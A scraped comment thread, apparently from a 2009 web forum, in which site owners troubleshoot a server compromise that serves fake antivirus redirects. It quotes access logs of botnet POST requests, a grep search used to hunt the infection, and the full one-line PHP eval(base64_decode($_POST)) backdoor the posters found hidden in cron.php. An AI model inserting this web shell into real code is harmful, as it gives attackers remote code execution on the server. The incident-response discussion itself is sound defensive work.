http://www.thomassigny.org/?P=editoeditorial&Article=5

Have fun !

How can I catch the malicious process and destroy it forever?

I read only information I receive on my websites, but not a solution.

smaert. com/apache_mischief/writeup. txt

The report on the above link tells you everything you need to know about how it works.

There are two symptoms of this problem which seem to make different browsers behave differently:

* a “virus warning” in IE and Opera
* blank pages in Firefox and Safari where a view source shows a bunch of weird links embedded in a portion of a js

The virus scan exploit only appears in IE (6,7,8) and Opera – that is to say
the blank pages don’t happen but on random pages you get the virus warning. In IE the you get the pop-up box that you must not click but in Opera you can stop all the javascripts running and you can see that the browser has been made to open in our case:

available-scanner. com/scan1/?pid=

Effectively this page spoofs a Windows screen.

The warning message box displayed in both IE and Opera is

——————begins————————-

Warning!!! Your personal computer needs to install antivirus software!
Cyber Security can perform fast and free virus and malicious software scan
of your computer .

——————ends————————-

There are two clickable buttons in the message both of which initiate a download.

In Firefox you only get random blank pages with the odd js when you view source

In Safari you only get what Firefox gets but the browser freezes.

The view source of the blank page reveals a set of links which are described elsewhere here but in our case the links were to alleged movie download pages.

I finally managed to locate the backdoor script in a client’s site using the grep commands listed above. However I never actually saw any suspicious processes running in the process list. Obviously they have learned to hide the process in question or it only runs for a very short length of time.

This is a somewhat scary type of exploit. I wish we knew what code they were using to compromise apache so we could further mitigate against this type of attack. It should not be possible to do this from a standard user account and it’s the first time I have ever come across anything like this. Anyway I have included some more details below which may help others.

PHP script was called “4_text2.php” inside in the images directory of a site. Site in question is extremely basic static page with no running PHP scripts and very few files. The only way this file could have been uploaded would be via compromised FTP. It was uploaded on April 29th however it has definitely not been active for anywhere near that long. According to the sites access logs something makes a POST request to the script nearly once per day.

94.113.68.144 – - [09/Oct/2009:16:29:44 +0100] “POST /images/4_text2.php HTTP/1.1″ 200 32 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)”
94.113.68.144 – - [09/Oct/2009:16:29:45 +0100] “POST /images/4_text2.php HTTP/1.1″ 200 398 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)”

The IP’s are random so it’s probably a botnet of some sort or else they are using multiple proxies. Another request later on in the day after the file was removed.

89.228.90.115 – - [10/Oct/2009:00:40:39 +0100] “POST /images/4_text2.php HTTP/1.1″ 404 216 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)”
89.78.135.127 – - [10/Oct/2009:00:40:45 +0100] “POST /images/4_text2.php HTTP/1.1″ 404 216 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)”
84.2.6.189 – - [10/Oct/2009:00:40:51 +0100] “POST /images/4_text2.php HTTP/1.1″ 404 216 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)”
92.81.178.251 – - [10/Oct/2009:00:40:57 +0100] “POST /images/4_text2.php HTTP/1.1″ 404 216 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)”

Also worrying is the fact that we had a number of functions disabled in PHP yet this was still able to get in.

Php.ini
disable_functions: exec, passthru, shell_exec, system, proc_open, parse_ini_file, show_source
enable_dl: Off

The server in question is a bit old so the software is not the newest but it is patched with all the latest security updates from Redhat. It’s an RHEL3 box with PHP 4.4.2 and Apache/2.0.46.

edf49a73f1671384311d493b6684bcc6

http://www.google.de/search?hl=de&q=edf49a73f1671384311d493b6684bcc6&meta=

Lean back and see how much sites are infected with these redirects.

We have the same problem on our server.
Sometimes visitors got a JS code instead of the real content.

If I restart the Apache, everything is okey for a day, but later (randomly) the JS code appears again.
I spent a whole day by waiting for the JS code appearing.
At 18:08 o’clock I realised the virus began to work again.

I searched the whole file system:

find . -iname ‘*php’ | xargs grep ‘\$_POST\[\"p\"\]‘ -sl

It found 1 php file (cron.php), I checked it and I found an inserted PHP code:

/*69e486fb604f458b2262e8cd52727773*/if(isset($_POST["p"])&&$_POST["p"]==”92e0297d52adb5a4b249308e0249139d”){eval(base64_decode($_POST["c"]));exit;}/*69e486fb604f458b2262e8cd52727773*/

(if you dont use wordwrap, you cant see it at first sight because of many whitespaces.)

(I know cron.php file (drupal cms) and this code was not there when our customer installed his CMS system, I think his ftp password was stolen, and a script modified this file)

I checked access log (for this website), search for the filename and I found this:

80.99.119.69 – - [09/Oct/2009:17:33:02 +0200] “POST /cron.php HTTP/1.1″ 200 32 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)” 0 website.com
80.99.119.69 – - [09/Oct/2009:17:33:03 +0200] “POST /cron.php HTTP/1.1″ 200 5339 “http://www.google.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)” 4 website.com

So I think this was happened:
17:33: The virus was activated by an external call (Posted data to cron.php, which was running the posted code – eval function do that)
18:08: Confirmed: I realised the virus began to work again in my browser (by reloading pages many times from our server)

I hope I found the problem. I keep checking our server…

Maybe this post will help to someone to get closer to solve this problem.

Because these attacks are randomly it will be tricky and lucky to make a screenshot at the same time when the attack starts, that was the reason why I write these macro.

I have used this macro on a clean pc, with windows xp and sp3, all xp updates and KIS 2010

The pages that are attacked are only those with high hit rates. They are located in 3 separate directories on the server.
My server access logs show I did not access my account on the dates when my pages have been modified. My computer was not in use on those days. The copies of the pages on my pc are clean.

I sure hope someone can help us because my web host is blaming my pc for the source of the problem. I scan as stealth on grc.com and have avg running continuously. Avg scans are always clean.